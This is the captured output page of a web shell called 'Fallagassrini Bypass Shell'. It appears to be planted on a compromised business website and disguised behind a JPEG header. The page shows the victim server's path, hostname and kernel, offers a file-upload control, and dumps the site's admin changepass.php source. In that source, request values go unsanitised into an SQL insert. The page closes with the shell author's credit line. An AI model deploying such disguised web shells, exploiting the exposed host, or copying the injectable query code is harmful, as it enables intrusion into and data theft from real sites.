JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/tarinient/domains/tarinienterprises.in/public_html/admin/

Linux venus.ewebguru.net 4.18.0-553.44.1.el8_10.x86_64 #1 SMP Mon Mar 10 05:10:11 EDT 2025 x86_64
Upload File :
Current File : /home/tarinient/domains/tarinienterprises.in/public_html/admin/changepass.php

<?php
session_start();
include('../configuration.php');
include("includes/php_devfunction.php");
check_userlogin();

if($_SERVER['REQUEST_METHOD']=="POST" && $_REQUEST["btnsubmit"]=="Save")
{
	$sqluser="SELECT max(account_no) as sid FROM tbl_newcall_details ";
	$rowuser = $db->Execute($sqluser);
	$total_max = $rowuser->RecordCount();
	
	if($total_max>0 && $rowuser->fields["sid"]!="Null" && !empty($rowuser->fields["sid"]))
		$snewid=$rowuser->fields["sid"]+1;
	else
		$snewid='200001';	        
	 
	 
	$ins_emp = "insert into tbl_newcall_details set
				account_no		= '".$snewid."',
				title			= '".$_REQUEST["saluname"]."',
				fname			= '".$_REQUEST["firstname"]."',
				lname			= '".$_REQUEST["lastname"]."',
				email_id		= '".$_REQUEST["peremail"]."',
				home_no			= '".$_REQUEST["contactno"]."',
				cell_no			= '".$_REQUEST["mobno"]."',
				address			= '".$_REQUEST["adddet"]."',
				note_details	= '".$_REQUEST["notedet"]."',
				selcountry		= '".$_REQUEST["selcountry"]."',
				selstate		= '".$_REQUEST["residntstate"]."',
				zipcode			= '".$_REQUEST["zipcode"]."',
				city_name		= '".$_REQUEST["selcity"]."',
				time_zone		= '".$_REQUEST["tmezone"]."',
				call_source		= '".$_REQUEST["callsource"]."',
				pc_brand		= '".$_REQUEST["pcbrand"]."',
				pc_model		= '".$_REQUEST["pcmodel"]."',
				os_system		= '".$_REQUEST["osoption"]."',
				how_old			= '".$_REQUEST["howold"]."',
				attached_device	= '".addslashes($_REQUEST["attdevice"])."',
				problems_brief	= '".addslashes($_REQUEST["problemsss"])."',
				voice_status	= '".$_REQUEST["voicestatus"]."',
				added_date		= '".date("Y-m-d")."',
				addedby			= '".$_SESSION['uniqID']."'";
				
			/*echo "<pre>";
			print_r($ins_emp);   	                 
			die;*/
			
		$ins_result = $db->Execute($ins_emp) or die(mysql_error());
		
	if(ins_result)
	{
		url_redirect("serviceboard.php?add=1");
	}
}


require '../fckeditor/fckeditor.php';
$oFCKeditor = new FCKeditor('attdevice') ;
$oFCKeditor->BasePath	= '../fckeditor/' ;
$oFCKeditor->Width = '520px';
$oFCKeditor->Height = '250px';
$oFCKeditor->Value		='';

//require '../fckeditor/fckeditor.php';
$oFCKeditor1 = new FCKeditor('problemsss') ;
$oFCKeditor1->BasePath	= '../fckeditor/' ;
$oFCKeditor1->Width = '520px';
$oFCKeditor1->Height = '250px';
$oFCKeditor1ss->Value		='';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title><?php echo PROJECT_TITLE;?></title>
	<link rel="stylesheet" type="text/css" href="css/text.css" />
    <link rel="stylesheet" type="text/css" href="css/grid.css"  />
    <link rel="stylesheet" type="text/css" href="css/layout.css"/>
    <link rel="stylesheet" type="text/css" href="css/nav.css"  />
    <link rel="stylesheet" type="text/css" href="css/reset.css" />
    <link href="css/demo_page.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="includes/jquery.js" type="text/javascript"></script>
<script language="javascript" src="includes/classified_ajax.js" type="text/javascript"></script>    
<script src="includes/javascript_function.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript">
//==== Validate form filled by user ================== 
function validateinfo()
{
	            
	 
	var oldpass=trim(document.frmcrm.oldpass.value);
	var newpass=trim(document.frmcrm.newpass.value);
	var confpass=trim(document.frmcrm.confpass.value);
	
	
	if(oldpass=="")
	{
		alert('Old Password should not be blank .');
		document.frmcrm.oldpass.focus();
		return false;
	}
	else if(newpass=="")
	{
		alert('New Password should not be blank.');
		document.frmcrm.newpass.focus();
		return false;
	}
	else if(newpass!=confpass)
	{
		alert('New password and confirm password must be same.');
		document.frmcrm.confpass.focus();
		return false;
	}
}
</script>
<!-- CAlendar Code here-->
<link type="text/css" href="calen/base/ui.all.css" rel="stylesheet" />
<script type="text/javascript" src="calen/jquery-1.3.2.js"></script>
<script type="text/javascript" src="calen/ui/ui.datepicker.js"></script>
<link type="text/css" href="calen/demos.css" rel="stylesheet" />
<script language="javascript" type="text/javascript">

$(function() {
			 
		$("#datepicker").datepicker({minDate: -30, maxDate: +30});
	});	

$(function() {
			 
		$("#datepicker1").datepicker({minDate: -30, maxDate: +30});
	});	
</script>
          
</head>

<body style="margin:0px; padding:0px;">
<div class="container_12">
        <div class="grid_12 header-repeat">
        <?php include("includes/service_top.php");?>
        </div>
        <div class="clear">
        </div>
        <?php //include("includes/topmenu.php");?>
        <div class="clear">
        </div>
        <div class="grid_2">
        <?php include("includes/leftmenu.php");?>    
        </div>
        <div class="grid_10">
            <div class="box round first">
                <h2>Change Password</h2>
                <div class="block">
                <!-- Table data start-->
<form name="frmcrm" id="frmcrm" action="" method="post" onsubmit="return validateinfo();" enctype="multipart/form-data">
<table width="100%" cellpadding="5" cellspacing="0" border="0" style="border:0px solid #999; border-collapse:collapse; font-size:12px;">
 <tr>
    <td valign="top">
    <fieldset style="border:1px solid #CCC; padding-left:10px;">
    <legend style="background-color:#CCC; color:#333; font-weight:bold; padding:6px;">Change Password</legend>
    <table border="0" width="95%" style="background-image:none; border:none;">
    <tr>
    <td align="right" width="30%"><label><b><span class="requfield">*</span>Old Password : </b></label></td>
    <td width="70%"><input type="text"  name="oldpass" id="oldpass"  value="" class="widtxt" /></td>
    </tr>
    <tr>
    <td align="right"><label><b><span class="requfield">*</span>New Password : </b></label></td>
    <td><input type="text"  name="newpass" id="newpass"  value="" class="widtxt" /></td>
    </tr> 
    <tr>
    <td align="right"><label><b><span class="requfield">*</span>Confirm Password : </b></label></td>
    <td><input type="text"  name="confpass" id="confpass"  value="" class="widtxt" /></td>
    </tr>  
    </table>
    </fieldset>
    </td>
  </tr>
  <tr>
    <td  align="center">
    <!--<a href="add_device.php">-->
    <input class="submit-green" name="btnsubmit" id="btnsubmit" type="submit" value="Save" />
    <!--</a>-->
    </td>
  </tr>
</table>
</form>	               
                <!-- Table data end-->
                </div>
            </div>
            
        </div>
        
        
        <div class="clear">
        </div>
    </div>
    <div class="clear">
    </div>
    <?php include("includes/footer.php");?>
</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net